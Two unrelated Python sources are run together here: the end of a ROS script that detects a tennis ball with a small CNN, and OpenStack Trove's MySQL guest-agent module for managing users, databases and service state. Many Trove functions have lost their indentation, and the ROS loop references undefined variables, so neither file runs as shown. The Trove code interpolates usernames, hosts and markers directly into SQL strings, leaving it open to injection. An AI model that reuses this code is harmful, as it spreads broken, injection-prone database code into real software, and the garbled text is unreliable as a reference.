  #camera back at the screen so it can see a tennis ball)
  #NOTE: this is a temporary solution until I can get
  #ROS to work with relative paths
  # NOTE(review): hard-coded absolute path -- breaks on any other machine.
  img = cv2.imread('/home/nick/catkin_ws/src/RockRaiderNeuralNet/vision_neural_net/src/Tennis.jpg',-1)
  cv2.imshow('image',img)
  #Crop the image to 32x32 so that the nn can read it
  cropped = img[0:1080,420:1500]
  cropped = cv2.resize(cropped, (32, 32))
  # Normalize to [0,1) floats and reorder to (batch, channel, height, width).
  cropped = np.array([cropped])/np.float64(256)
  cropped = cropped.reshape((cropped.shape[0],3,32,32))
  #Make a prediction on our ideal tennis ball
  print("Predicted class for first test input: %r" % predict_fn(cropped))
  print np.median(predict_fn(cropped))
  #Run through the main loop of the program
  # NOTE(review): predict_fn is local here and is not handed to Loop --
  # verify that Loop can obtain its own predictor.
  Loop(cap)
  cv2.destroyAllWindows()
  return
#Loop
#every node should have one
def Loop(cap):
if cap == -1:
return
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
#crop the image to 32x32 from 480p
cropped_frame = frame[0:480,80:560]
cropped_frame = cv2.resize(cropped, (32, 32))
#Convert image to float for prediction function
cropped_frame = np.array([cropped])/np.float32(256)
cropped_frame = cropped_frame.reshape((cropped_frame.shape[0],3,32,32))
prediction = predict_fn(cropped_frame)
#print prediction
#print np.median(prediction)
#make a guess as to whether it's a tennis ball
if np.median(prediction) < 0.0000001:
print "I see a tennis ball"
else:
print "I don't see a tennis ball"
# Display the resulting frame
cv2.imshow('frame',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
# When everything done, release the capture
cap.release()
return
#########################################################################################
#Helper Functions
'''
parse_arguments
Allows for command line arguments to be run when calling rosrun
'''
def parse_arguments():
    """Parse the command-line options understood by this node."""
    arg_parser = argparse.ArgumentParser()
    # Single option selecting the video source; defaults to the webcam.
    arg_parser.add_argument("-vid", "-v",type=str, default = "cam",
        help="Run ReadImage.py with desired video source,\
            currently accepted parameters are 'image', 'cam', and 'ros'")
    return arg_parser.parse_args()
'''
prepare_network
Using build_network with given weights and Theano,
set up the predictor functionused in the camera feed
'''
def prepare_network(weights_path='/home/nick/catkin_ws/src/RockRaiderNeuralNet/vision_neural_net/src/layers.txt.npz'):
    """Build the CNN, load trained weights, and compile a predictor.

    :param weights_path: .npz archive of lasagne parameter arrays.
        Generalized from the previously hard-coded absolute path; the
        default keeps backward compatibility with existing callers.
    :return: compiled Theano function mapping a (batch, 3, 32, 32)
        float tensor to class probabilities.
    """
    input_var = T.tensor4('inputs')
    #Build a network with random weights
    nn = build_network((3,32,32),input_var)
    #Load our network with weights from training
    with np.load(weights_path) as f:
        layers = [f['arr_%d' % i] for i in range(len(f.files))]
    lasagne.layers.set_all_param_values(nn,layers)
    #Create the prediction function to guess whether image is a tennis ball or not
    # deterministic=True disables dropout for inference.
    prediction = lasagne.layers.get_output(nn, deterministic=True)
    predict_fn = theano.function([input_var], prediction)
    return predict_fn
'''
build_network
Set up the convolutional nn
'''
def build_network(inputShape,inputVal = None):
    """Construct the (untrained) convolutional network architecture.

    :param inputShape: (channels, height, width) of the input images.
    :param inputVal: optional Theano variable to bind as the input.
    :return: the output lasagne layer of the assembled network.
    """
    #Create a nn that looks at images of size 32x32 with 3 channels
    nn = lasagne.layers.InputLayer(
        shape=(None,inputShape[0],inputShape[1],inputShape[2]), input_var=inputVal)
    #Set the convolutional layer to have 32 filters of size 5x5
    #(the old comment said 16, which did not match the code)
    nn = lasagne.layers.Conv2DLayer(nn,num_filters=32,filter_size=(5,5),
        nonlinearity=lasagne.nonlinearities.rectify,W=lasagne.init.GlorotUniform())
    #Create a max-pooling of factor 2 in both dimensions
    nn = lasagne.layers.MaxPool2DLayer(nn, pool_size=(2,2))
    # Another convolution with 32 5x5 kernels, and another 2x2 pooling:
    nn = lasagne.layers.Conv2DLayer(nn, num_filters=32, filter_size=(5, 5),
        nonlinearity=lasagne.nonlinearities.rectify)
    nn = lasagne.layers.MaxPool2DLayer(nn, pool_size=(2, 2))
    # A fully-connected layer of 256 units with 50% dropout on its inputs:
    nn = lasagne.layers.DenseLayer(lasagne.layers.dropout(nn, p=.5),
        num_units=256,nonlinearity=lasagne.nonlinearities.rectify)
    # And, finally, the 10-unit output layer with 50% dropout on its inputs:
    nn = lasagne.layers.DenseLayer(lasagne.layers.dropout(nn, p=.5),
        num_units=10,nonlinearity=lasagne.nonlinearities.softmax)
    return nn
#########################################################################################
#Main
if __name__ == '__main__':
    # Script entry point: parse CLI options, then run Setup() which in
    # turn starts the capture loop.
    args = parse_arguments()
    Setup(args)
| |
# Copyright 2013 OpenStack Foundation
# Copyright 2013 Rackspace Hosting
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import os
import re
import uuid
from collections import defaultdict
import sqlalchemy
from sqlalchemy import exc
from sqlalchemy import interfaces
from sqlalchemy.sql.expression import text
from trove.common import cfg
from trove.common import utils as utils
from trove.common import exception
from trove.common import instance as rd_instance
from trove.common.exception import PollTimeOut
from trove.guestagent.common import operating_system
from trove.guestagent.common import sql_query
from trove.guestagent.db import models
from trove.guestagent import pkg
from trove.guestagent.datastore import service
from trove.openstack.common import log as logging
from trove.common.i18n import _
# Name of the administrative account the guest agent uses for its own work.
ADMIN_USER_NAME = "os_admin"
LOG = logging.getLogger(__name__)
FLUSH = text(sql_query.FLUSH)
# Lazily-created module-wide SQLAlchemy engine (see get_engine()).
ENGINE = None
PREPARING = False
UUID = False
TMP_MYCNF = "/tmp/my.cnf.tmp"
MYSQL_BASE_DIR = "/var/lib/mysql"
CONF = cfg.CONF
MANAGER = CONF.datastore_manager if CONF.datastore_manager else 'mysql'
# Comparison operators used when paginating past a marker value.
INCLUDE_MARKER_OPERATORS = {
    True: ">=",
    False: ">"
}
# Distribution-specific locations of the main my.cnf and service binaries.
OS_NAME = operating_system.get_os()
MYSQL_CONFIG = {operating_system.REDHAT: "/etc/my.cnf",
                operating_system.DEBIAN: "/etc/mysql/my.cnf",
                operating_system.SUSE: "/etc/my.cnf"}[OS_NAME]
MYSQL_SERVICE_CANDIDATES = ["mysql", "mysqld", "mysql-server"]
MYSQL_BIN_CANDIDATES = ["/usr/sbin/mysqld", "/usr/libexec/mysqld"]
MYCNF_OVERRIDES = "/etc/mysql/conf.d/overrides.cnf"
MYCNF_OVERRIDES_TMP = "/tmp/overrides.cnf.tmp"
MYCNF_REPLMASTER = "/etc/mysql/conf.d/0replmaster.cnf"
MYCNF_REPLSLAVE = "/etc/mysql/conf.d/1replslave.cnf"
MYCNF_REPLCONFIG_TMP = "/tmp/replication.cnf.tmp"
# Create a package impl
packager = pkg.Package()
def clear_expired_password():
    """
    Some mysql installations generate random root password
    and save it in /root/.mysql_secret, this password is
    expired and should be changed by client that supports expired passwords.
    """
    LOG.debug("Removing expired password.")
    secret_file = "/root/.mysql_secret"
    # Read the generated secret; the file is root-only, hence sudo.
    try:
        out, err = utils.execute("cat", secret_file,
                                 run_as_root=True, root_helper="sudo")
    except exception.ProcessExecutionError:
        # No secret file means there is no expired password to clear.
        LOG.exception(_("/root/.mysql_secret does not exist."))
        return
    m = re.match('# The random password set for the root user at .*: (.*)',
                 out)
    if m:
        # Use the expired password once to blank root's password, then
        # remove the secret file so this never re-runs.
        try:
            out, err = utils.execute("mysqladmin", "-p%s" % m.group(1),
                                     "password", "", run_as_root=True,
                                     root_helper="sudo")
        except exception.ProcessExecutionError:
            LOG.exception(_("Cannot change mysql password."))
            return
        utils.execute("rm", "-f", secret_file, run_as_root=True,
                      root_helper="sudo")
        LOG.debug("Expired password removed.")
def get_auth_password():
    """Read the os_admin password out of my.cnf.

    :raises RuntimeError: when the awk invocation reports an error.
    """
    # Pull the third field of the first "password\t=" line in my.cnf.
    output, error = utils.execute_with_timeout(
        "sudo",
        "awk",
        "/password\\t=/{print $3; exit}",
        MYSQL_CONFIG)
    if not error:
        return output.strip()
    LOG.error(error)
    raise RuntimeError("Problem reading my.cnf! : %s" % error)
def get_engine():
    """Return the cached SQLAlchemy engine, creating it on first use."""
    #TODO(rnirmal): Based on permissions issues being resolved we may revert
    #url = URL(drivername='mysql', host='localhost',
    #          query={'read_default_file': '/etc/mysql/my.cnf'})
    global ENGINE
    if not ENGINE:
        # First call: connect as os_admin using the password from my.cnf.
        pwd = get_auth_password()
        ENGINE = sqlalchemy.create_engine(
            "mysql://%s:%s@localhost:3306" % (ADMIN_USER_NAME, pwd.strip()),
            pool_recycle=7200,
            echo=CONF.sql_query_logging,
            listeners=[KeepAliveConnection()])
    return ENGINE
def load_mysqld_options():
    """Return mysqld's effective defaults as a dict of option -> [values].

    Locates the mysqld binary, runs it with --print-defaults and parses
    the resulting "--key=value" tokens.  Options given more than once keep
    all their values, in order.  Returns {} when no binary is found or the
    command fails.
    """
    # Find the mysqld binary (renamed from 'bin', which shadowed the
    # builtin of the same name).
    mysqld_bin = None
    for candidate in MYSQL_BIN_CANDIDATES:
        if os.path.isfile(candidate):
            mysqld_bin = candidate
            break
    if mysqld_bin is None:
        return {}
    try:
        out, err = utils.execute(mysqld_bin, "--print-defaults",
                                 run_as_root=True, root_helper="sudo")
        # The second line of output holds the space-separated arguments.
        arglist = re.split("\n", out)[1].split()
        args = defaultdict(list)
        for item in arglist:
            if "=" in item:
                key, value = item.split("=", 1)
                args[key.lstrip("--")].append(value)
            else:
                args[item.lstrip("--")].append(None)
        return args
    except exception.ProcessExecutionError:
        return {}
class MySqlAppStatus(service.BaseDbStatus):
    """Singleton that probes the actual state of the local MySQL service."""
    @classmethod
    def get(cls):
        """Return the process-wide singleton instance."""
        if not cls._instance:
            cls._instance = MySqlAppStatus()
        return cls._instance
    def _get_actual_db_status(self):
        """Probe MySQL and map the result onto a ServiceStatus.

        Probe order: mysqladmin ping (RUNNING) -> process listed by ps
        (BLOCKED) -> stale pid file (CRASHED) -> otherwise SHUTDOWN.
        """
        try:
            out, err = utils.execute_with_timeout(
                "/usr/bin/mysqladmin",
                "ping", run_as_root=True, root_helper="sudo",
                log_output_on_error=True)
            LOG.info(_("MySQL Service Status is RUNNING."))
            return rd_instance.ServiceStatuses.RUNNING
        except exception.ProcessExecutionError:
            LOG.exception(_("Failed to get database status."))
            try:
                # Ping failed; see if a mysqld process exists at all.
                out, err = utils.execute_with_timeout("/bin/ps", "-C",
                                                      "mysqld", "h")
                pid = out.split()[0]
                # TODO(rnirmal): Need to create new statuses for instances
                # where the mysql service is up, but unresponsive
                LOG.info(_('MySQL Service Status %(pid)s is BLOCKED.') %
                         {'pid': pid})
                return rd_instance.ServiceStatuses.BLOCKED
            except exception.ProcessExecutionError:
                LOG.exception(_("Process execution failed."))
                # No process: a leftover pid file implies a crash.
                mysql_args = load_mysqld_options()
                pid_file = mysql_args.get('pid_file',
                                          ['/var/run/mysqld/mysqld.pid'])[0]
                if os.path.exists(pid_file):
                    LOG.info(_("MySQL Service Status is CRASHED."))
                    return rd_instance.ServiceStatuses.CRASHED
                else:
                    LOG.info(_("MySQL Service Status is SHUTDOWN."))
                    return rd_instance.ServiceStatuses.SHUTDOWN
class LocalSqlClient(object):
    """Context-managed sqlalchemy connection wrapping one transaction.

    On a clean exit the transaction is committed (optionally preceded by
    a privileges FLUSH); when an exception escapes, it is rolled back.
    """
    def __init__(self, engine, use_flush=True):
        self.engine = engine
        self.use_flush = use_flush

    def __enter__(self):
        self.conn = self.engine.connect()
        self.trans = self.conn.begin()
        return self.conn

    def __exit__(self, exc_type, exc_value, exc_tb):
        if self.trans:
            if exc_type is None:
                # Clean exit: flush privileges if requested, then commit.
                if self.use_flush:
                    self.conn.execute(FLUSH)
                self.trans.commit()
            else:
                # An exception escaped the with-block: undo everything.
                self.trans.rollback()
        self.conn.close()

    def execute(self, t, **kwargs):
        """Run one statement; roll back and disarm the transaction on error."""
        try:
            return self.conn.execute(t, kwargs)
        except Exception:
            self.trans.rollback()
            self.trans = None
            raise
class MySqlAdmin(object):
"""Handles administrative tasks on the MySQL database."""
    def _associate_dbs(self, user):
        """Internal. Given a MySQLUser, populate its databases attribute."""
        LOG.debug("Associating dbs to user %s at %s." %
                  (user.name, user.host))
        with LocalSqlClient(get_engine()) as client:
            # Any privilege beyond bare USAGE counts as access to a schema.
            q = sql_query.Query()
            q.columns = ["grantee", "table_schema"]
            q.tables = ["information_schema.SCHEMA_PRIVILEGES"]
            q.group = ["grantee", "table_schema"]
            q.where = ["privilege_type != 'USAGE'"]
            t = text(str(q))
            db_result = client.execute(t)
            for db in db_result:
                LOG.debug("\t db: %s." % db)
                # Grantees are quoted as 'user'@'host' in the result set.
                if db['grantee'] == "'%s'@'%s'" % (user.name, user.host):
                    mysql_db = models.MySQLDatabase()
                    mysql_db.name = db['table_schema']
                    user.databases.append(mysql_db.serialize())
#rds-start
def _associate_users(self, database):
"""Internal. Given a MySQLDatabase, populate its relatived users"""
LOG.debug("Get all users that can to access the specified database" % database)
users = []
with LocalSqlClient(get_engine()) as client:
q = sql_query.Query()
q.columns = ["grantee", "table_schema"]
q.tables = ["information_schema.SCHEMA_PRIVILEGES"]
q.group = ["grantee"]
q.where = ["privilege_type != 'USAGE'","table_schema = '%s'" % database['_name']]
t = text(str(q))
user_result = client.execute(t).fetchall()
if len(user_result):
for user in user_result:
LOG.debug("\t user: %s." % user) # i.e: 'u1'@'%'
user = user[0].strip().split('@') # i.e: ["'u1'","'%'"]
user = [item.strip('\'') for item in user] # i.e: ["u1","%"]
users.append(user)
return users
#rds-end
    def change_passwords(self, users):
        """Change the passwords of one or more existing users.

        :param users: list of dicts with 'name', 'host' and 'password'.
        """
        LOG.debug("Changing the password of some users.")
        with LocalSqlClient(get_engine()) as client:
            for item in users:
                LOG.debug("Changing password for user %s." % item)
                # Re-key into the serialized form MySQLUser.deserialize expects.
                user_dict = {'_name': item['name'],
                             '_host': item['host'],
                             '_password': item['password']}
                user = models.MySQLUser()
                user.deserialize(user_dict)
                LOG.debug("\tDeserialized: %s." % user.__dict__)
                uu = sql_query.UpdateUser(user.name, host=user.host,
                                          clear=user.password)
                t = text(str(uu))
                client.execute(t)
def update_attributes(self, username, hostname, user_attrs):
"""Change the attributes of an existing user."""
LOG.debug("Changing user attributes for user %s." % username)
user = self._get_user(username, hostname)
db_access = set()
grantee = set()
with LocalSqlClient(get_engine()) as client:
q = sql_query.Query()
q.columns = ["grantee", "table_schema"]
q.tables = ["information_schema.SCHEMA_PRIVILEGES"]
q.group = ["grantee", "table_schema"]
q.where = ["privilege_type != 'USAGE'"]
t = text(str(q))
db_result = client.execute(t)
for db in db_result:
grantee.add(db['grantee'])
if db['grantee'] == "'%s'@'%s'" % (user.name, user.host):
db_name = db['table_schema']
db_access.add(db_name)
with LocalSqlClient(get_engine()) as client:
uu = sql_query.UpdateUser(user.name, host=user.host,
clear=user_attrs.get('password'),
new_user=user_attrs.get('name'),
new_host=user_attrs.get('host'))
t = text(str(uu))
client.execute(t)
uname = user_attrs.get('name') or username
host = user_attrs.get('host') or hostname
find_user = "'%s'@'%s'" % (uname, host)
if find_user not in grantee:
self.grant_access(uname, host, db_access)
def create_database(self, databases):
"""Create the list of specified databases."""
with LocalSqlClient(get_engine()) as client:
for item in databases:
mydb = models.ValidatedMySQLDatabase()
mydb.deserialize(item)
cd = sql_query.CreateDatabase(mydb.name,
mydb.character_set,
mydb.collate)
t = text(str(cd))
client.execute(t)
    def create_user(self, users):
        """Create users and grant them privileges for the
        specified databases.
        """
        with LocalSqlClient(get_engine()) as client:
            for item in users:
                user = models.MySQLUser()
                user.deserialize(item)
                # TODO(cp16net):Should users be allowed to create users
                # 'os_admin' or 'debian-sys-maint'
                # A bare grant creates the account itself...
                g = sql_query.Grant(user=user.name, host=user.host,
                                    clear=user.password)
                t = text(str(g))
                client.execute(t)
                # ...then per-database ALL grants give it its access.
                for database in user.databases:
                    mydb = models.ValidatedMySQLDatabase()
                    mydb.deserialize(database)
                    g = sql_query.Grant(permissions='ALL', database=mydb.name,
                                        user=user.name, host=user.host,
                                        clear=user.password)
                    t = text(str(g))
                    client.execute(t)
    def delete_database(self, database):
        """Delete the specified database."""
        #rds-start
        # Revoke every user's access first so no orphaned grants remain
        # after the schema is dropped.
        users = self._associate_users(database)
        if users:
            for user in users:
                self.revoke_access(user[0], user[1], database['_name'])
        #rds-end
        with LocalSqlClient(get_engine()) as client:
            mydb = models.ValidatedMySQLDatabase()
            mydb.deserialize(database)
            dd = sql_query.DropDatabase(mydb.name)
            t = text(str(dd))
            client.execute(t)
def delete_user(self, user):
"""Delete the specified user."""
mysql_user = models.MySQLUser()
mysql_user.deserialize(user)
self.delete_user_by_name(mysql_user.name, mysql_user.host)
def delete_user_by_name(self, name, host='%'):
with LocalSqlClient(get_engine()) as client:
du = sql_query.DropUser(name, host=host)
t = text(str(du))
LOG.debug("delete_user_by_name: %s", t)
client.execute(t)
def get_user(self, username, hostname):
user = self._get_user(username, hostname)
if not user:
return None
return user.serialize()
def _get_user(self, username, hostname):
"""Return a single user matching the criteria."""
user = models.MySQLUser()
try:
user.name = username # Could possibly throw a BadRequest here.
except exception.ValueError as ve:
LOG.exception(_("Error Getting user information"))
raise exception.BadRequest(_("Username %(user)s is not valid"
": %(reason)s") %
{'user': username, 'reason': ve.message}
)
with LocalSqlClient(get_engine()) as client:
q = sql_query.Query()
q.columns = ['User', 'Host', 'Password']
q.tables = ['mysql.user']
q.where = ["Host != 'localhost'",
"User = '%s'" % username,
"Host = '%s'" % hostname]
q.order = ['User', 'Host']
t = text(str(q))
result = client.execute(t).fetchall()
LOG.debug("Getting user information %s." % result)
if len(result) != 1:
return None
found_user = result[0]
user.password = found_user['Password']
user.host = found_user['Host']
self._associate_dbs(user)
return user
def grant_access(self, username, hostname, databases, permissions):
"""Grant a user permission to use a given database."""
user = self._get_user(username, hostname)
mydb = models.ValidatedMySQLDatabase()
with LocalSqlClient(get_engine()) as client:
for database in databases:
try:
mydb.name = database
except ValueError:
LOG.exception(_("Error granting access"))
raise exception.BadRequest(_(
"Grant access to %s is not allowed") % database)
g = sql_query.Grant(permissions=permissions, database=mydb.name,
user=user.name, host=user.host,
hashed=user.password)
t = text(str(g))
client.execute(t)
    def is_root_enabled(self):
        """Return True if root access is enabled; False otherwise."""
        # Delegates to the shared MySqlRootAccess helper.
        return MySqlRootAccess.is_root_enabled()
    def enable_root(self, root_password=None):
        """Enable the root user global access and/or
        reset the root password.
        """
        # Delegates to the shared MySqlRootAccess helper.
        return MySqlRootAccess.enable_root(root_password)
    def list_databases(self, limit=None, marker=None, include_marker=False):
        """List databases the user created on this mysql instance.

        :param limit: page size; one extra row is fetched to detect
            whether a following page exists.
        :param marker: schema name to page past.
        :param include_marker: whether the marker row itself is included.
        :return: (databases, next_marker) tuple; next_marker is None on
            the last page.
        """
        LOG.debug("---Listing Databases---")
        ignored_database_names = "'%s'" % "', '".join(CONF.ignore_dbs)
        LOG.debug("The following database names are on ignore list and will "
                  "be omitted from the listing: %s" % ignored_database_names)
        databases = []
        with LocalSqlClient(get_engine()) as client:
            # If you have an external volume mounted at /var/lib/mysql
            # the lost+found directory will show up in mysql as a database
            # which will create errors if you try to do any database ops
            # on it. So we remove it here if it exists.
            q = sql_query.Query()
            q.columns = [
                'schema_name as name',
                'default_character_set_name as charset',
                'default_collation_name as collation',
            ]
            q.tables = ['information_schema.schemata']
            q.where = ["schema_name NOT IN (" + ignored_database_names + ")"]
            q.order = ['schema_name ASC']
            if limit:
                # Request one extra row to detect a following page.
                q.limit = limit + 1
            if marker:
                q.where.append("schema_name %s '%s'" %
                               (INCLUDE_MARKER_OPERATORS[include_marker],
                                marker))
            t = text(str(q))
            database_names = client.execute(t)
            next_marker = None
            LOG.debug("database_names = %r." % database_names)
            for count, database in enumerate(database_names):
                # Stop at the page boundary; the extra row only signals
                # that another page exists.
                if count >= limit:
                    break
                LOG.debug("database = %s." % str(database))
                mysql_db = models.MySQLDatabase()
                mysql_db.name = database[0]
                next_marker = mysql_db.name
                mysql_db.character_set = database[1]
                mysql_db.collate = database[2]
                databases.append(mysql_db.serialize())
        LOG.debug("databases = " + str(databases))
        if database_names.rowcount <= limit:
            next_marker = None
        return databases, next_marker
    def list_users(self, limit=None, marker=None, include_marker=False):
        """List users that have access to the database.

        Paginates with a synthetic user@host 'Marker' column; returns a
        (users, next_marker) tuple (next_marker is None on the last page).
        The generated SQL has the shape shown below.
        """
        '''
        SELECT
            User,
            Host,
            Marker
        FROM
            (SELECT
                User,
                Host,
                CONCAT(User, '@', Host) as Marker
            FROM mysql.user
            ORDER BY 1, 2) as innerquery
        WHERE
            Marker > :marker
        ORDER BY
            Marker
        LIMIT :limit;
        '''
        LOG.debug("---Listing Users---")
        users = []
        with LocalSqlClient(get_engine()) as client:
            mysql_user = models.MySQLUser()
            iq = sql_query.Query()  # Inner query.
            # Marker pairs name and host so pagination order is stable.
            iq.columns = ['User', 'Host', "CONCAT(User, '@', Host) as Marker"]
            iq.tables = ['mysql.user']
            iq.order = ['User', 'Host']
            innerquery = str(iq).rstrip(';')
            oq = sql_query.Query()  # Outer query.
            oq.columns = ['User', 'Host', 'Marker']
            oq.tables = ['(%s) as innerquery' % innerquery]
            oq.where = ["Host != 'localhost'"]
            oq.order = ['Marker']
            if marker:
                oq.where.append("Marker %s '%s'" %
                                (INCLUDE_MARKER_OPERATORS[include_marker],
                                 marker))
            if limit:
                # Fetch one extra row to know whether a next page exists.
                oq.limit = limit + 1
            t = text(str(oq))
            result = client.execute(t)
            next_marker = None
            LOG.debug("result = " + str(result))
            for count, row in enumerate(result):
                if count >= limit:
                    break
                LOG.debug("user = " + str(row))
                mysql_user = models.MySQLUser()
                mysql_user.name = row['User']
                mysql_user.host = row['Host']
                self._associate_dbs(mysql_user)
                next_marker = row['Marker']
                users.append(mysql_user.serialize())
        if result.rowcount <= limit:
            next_marker = None
        LOG.debug("users = " + str(users))
        return users, next_marker
def revoke_access(self, username, hostname, database):
"""Revoke a user's permission to use a given database."""
user = self._get_user(username, hostname)
with LocalSqlClient(get_engine()) as client:
r = sql_query.Revoke(database=database,
user=user.name,
host=user.host)
t = text(str(r))
client.execute(t)
    def list_access(self, username, hostname):
        """Show all the databases to which the user has more than
        USAGE granted.
        """
        # databases is populated by _associate_dbs() inside _get_user().
        user = self._get_user(username, hostname)
        return user.databases
class KeepAliveConnection(interfaces.PoolListener):
    """
    A connection pool listener that ensures live connections are returned
    from the connection pool at checkout. This alleviates the problem of
    MySQL connections timing out.
    """
    def checkout(self, dbapi_con, con_record, con_proxy):
        """Event triggered when a connection is checked out from the pool."""
        try:
            try:
                # Some drivers accept a reconnect flag on ping(); fall
                # back to the no-argument form when they do not.
                dbapi_con.ping(False)
            except TypeError:
                dbapi_con.ping()
        except dbapi_con.OperationalError as ex:
            # "Server has gone away"-class error codes: tell the pool to
            # discard this connection and hand out a fresh one.
            if ex.args[0] in (2006, 2013, 2014, 2045, 2055):
                raise exc.DisconnectionError()
            else:
                raise
class MySqlApp(object):
"""Prepares DBaaS on a Guest container."""
TIME_OUT = 1000
    def __init__(self, status):
        """By default login with root no password for initial setup.

        :param status: MySqlAppStatus used to track/report service state.
        """
        self.state_change_wait_time = CONF.state_change_wait_time
        self.status = status
    def _create_admin_user(self, client, password):
        """
        Create a os_admin user with a random password
        with all privileges similar to the root user.
        """
        localhost = "localhost"
        # GRANT ALL ... WITH GRANT OPTION, restricted to local logins.
        g = sql_query.Grant(permissions='ALL', user=ADMIN_USER_NAME,
                            host=localhost, grant_option=True, clear=password)
        t = text(str(g))
        client.execute(t)
    @staticmethod
    def _generate_root_password(client):
        """Generate and set a random root password and forget about it."""
        localhost = "localhost"
        # Root keeps localhost-only access under an unrecorded password.
        uu = sql_query.UpdateUser("root", host=localhost,
                                  clear=utils.generate_random_password())
        t = text(str(uu))
        client.execute(t)
    def install_if_needed(self, packages):
        """Prepare the guest machine with a secure
        mysql server installation.

        :param packages: distro packages to install when not yet present.
        """
        LOG.info(_("Preparing Guest as MySQL Server."))
        if not packager.pkg_is_installed(packages):
            LOG.debug("Installing MySQL server.")
            # Move any stale configs aside before the package writes new ones.
            self._clear_mysql_config()
            # set blank password on pkg configuration stage
            pkg_opts = {'root_password': '',
                        'root_password_again': ''}
            packager.pkg_install(packages, pkg_opts, self.TIME_OUT)
            self._create_mysql_confd_dir()
            LOG.info(_("Finished installing MySQL server."))
        self.start_mysql()
    def complete_install_or_restart(self):
        """Signal the status tracker that an install/restart has finished."""
        self.status.end_install_or_restart()
    def secure(self, config_contents, overrides):
        """Secure a fresh installation: create os_admin, drop anonymous
        users, then restart under the rendered configuration.
        """
        LOG.info(_("Generating admin password."))
        admin_password = utils.generate_random_password()
        clear_expired_password()
        # Root still has no password at this point, so connect directly.
        engine = sqlalchemy.create_engine("mysql://root:@localhost:3306",
                                          echo=True)
        with LocalSqlClient(engine) as client:
            self._remove_anonymous_user(client)
            self._create_admin_user(client, admin_password)
        self.stop_db()
        self._write_mycnf(admin_password, config_contents, overrides)
        self.start_mysql()
        LOG.debug("MySQL secure complete.")
    def secure_root(self, secure_remote_root=True):
        """Randomize root's password; optionally drop remote root access."""
        with LocalSqlClient(get_engine()) as client:
            LOG.info(_("Preserving root access from restore."))
            self._generate_root_password(client)
            if secure_remote_root:
                self._remove_remote_root_access(client)
def _clear_mysql_config(self):
"""Clear old configs, which can be incompatible with new version."""
LOG.debug("Clearing old MySQL config.")
random_uuid = str(uuid.uuid4())
configs = ["/etc/my.cnf", "/etc/mysql/conf.d", "/etc/mysql/my.cnf"]
for config in configs:
command = "mv %s %s_%s" % (config, config, random_uuid)
try:
utils.execute_with_timeout(command, shell=True,
root_helper="sudo")
LOG.debug("%s saved to %s_%s." %
(config, config, random_uuid))
except exception.ProcessExecutionError:
pass
def _create_mysql_confd_dir(self):
conf_dir = "/etc/mysql/conf.d"
LOG.debug("Creating %s." % conf_dir)
command = "sudo mkdir -p %s" % conf_dir
utils.execute_with_timeout(command, shell=True)
    def _enable_mysql_on_boot(self):
        """Register MySQL with the init system so it starts on boot.

        :raises RuntimeError: when no known service name is found.
        """
        LOG.debug("Enabling MySQL on boot.")
        try:
            mysql_service = operating_system.service_discovery(
                MYSQL_SERVICE_CANDIDATES)
            utils.execute_with_timeout(mysql_service['cmd_enable'], shell=True)
        except KeyError:
            LOG.exception(_("Error enabling MySQL start on boot."))
            raise RuntimeError("Service is not discovered.")
    def _disable_mysql_on_boot(self):
        """Unregister MySQL from the init system's boot sequence.

        :raises RuntimeError: when no known service name is found.
        """
        try:
            mysql_service = operating_system.service_discovery(
                MYSQL_SERVICE_CANDIDATES)
            utils.execute_with_timeout(mysql_service['cmd_disable'],
                                       shell=True)
        except KeyError:
            LOG.exception(_("Error disabling MySQL start on boot."))
            raise RuntimeError("Service is not discovered.")
    def stop_db(self, update_db=False, do_not_start_on_reboot=False):
        """Stop MySQL and wait until the status poller reports SHUTDOWN.

        :raises RuntimeError: when the service cannot be discovered or
            does not reach SHUTDOWN within state_change_wait_time.
        """
        LOG.info(_("Stopping MySQL."))
        if do_not_start_on_reboot:
            self._disable_mysql_on_boot()
        try:
            mysql_service = operating_system.service_discovery(
                MYSQL_SERVICE_CANDIDATES)
            utils.execute_with_timeout(mysql_service['cmd_stop'], shell=True)
        except KeyError:
            LOG.exception(_("Error stopping MySQL."))
            raise RuntimeError("Service is not discovered.")
        if not self.status.wait_for_real_status_to_change_to(
                rd_instance.ServiceStatuses.SHUTDOWN,
                self.state_change_wait_time, update_db):
            LOG.error(_("Could not stop MySQL."))
            self.status.end_install_or_restart()
            raise RuntimeError("Could not stop MySQL!")
def _remove_anonymous_user(self, client):
t = text(sql_query.REMOVE_ANON)
client.execute(t)
def _remove_remote_root_access(self, client):
t = text(sql_query.REMOVE_ROOT)
client.execute(t)
    def restart(self):
        """Restart MySQL, keeping the reported status accurate throughout."""
        try:
            self.status.begin_restart()
            self.stop_db()
            self.start_mysql()
        finally:
            # Always leave the status tracker in a consistent state.
            self.status.end_install_or_restart()
def update_overrides(self, override_values):
"""
This function will update the MySQL overrides.cnf file
if there is content to write.
:param override_values:
:return:
"""
if override_values:
LOG.debug("Writing new overrides.cnf config file.")
self._write_config_overrides(override_values)
    def apply_overrides(self, overrides):
        """Apply configuration overrides to the running server via SET.

        :param overrides: mapping of server variable name -> value.
            Variables that fail to apply are logged, not fatal.
        """
        LOG.debug("Applying overrides to MySQL.")
        with LocalSqlClient(get_engine()) as client:
            LOG.debug("Updating override values in running MySQL.")
            for k, v in overrides.iteritems():
                q = sql_query.SetServerVariable(key=k, value=v)
                t = text(str(q))
                try:
                    client.execute(t)
                except exc.OperationalError:
                    output = {'key': k, 'value': v}
                    LOG.exception(_("Unable to set %(key)s with value "
                                    "%(value)s.") % output)
def make_read_only(self, read_only):
with LocalSqlClient(get_engine()) as client:
q = "set global read_only = %s" % read_only
client.execute(text(str(q)))
def _write_temp_mycnf_with_admin_account(self, original_file_path,
temp_file_path, password):
mycnf_file = open(original_file_path, 'r')
tmp_file = open(temp_file_path, 'w')
for line in mycnf_file:
tmp_file.write(line)
if "[client]" in line:
tmp_file.write("user\t\t= %s\n" % ADMIN_USER_NAME)
tmp_file.write("password\t= %s\n" % password)
mycnf_file.close()
tmp_file.close()
    def wipe_ib_logfiles(self):
        """Destroys the iblogfiles.

        If for some reason the selected log size in the conf changes from the
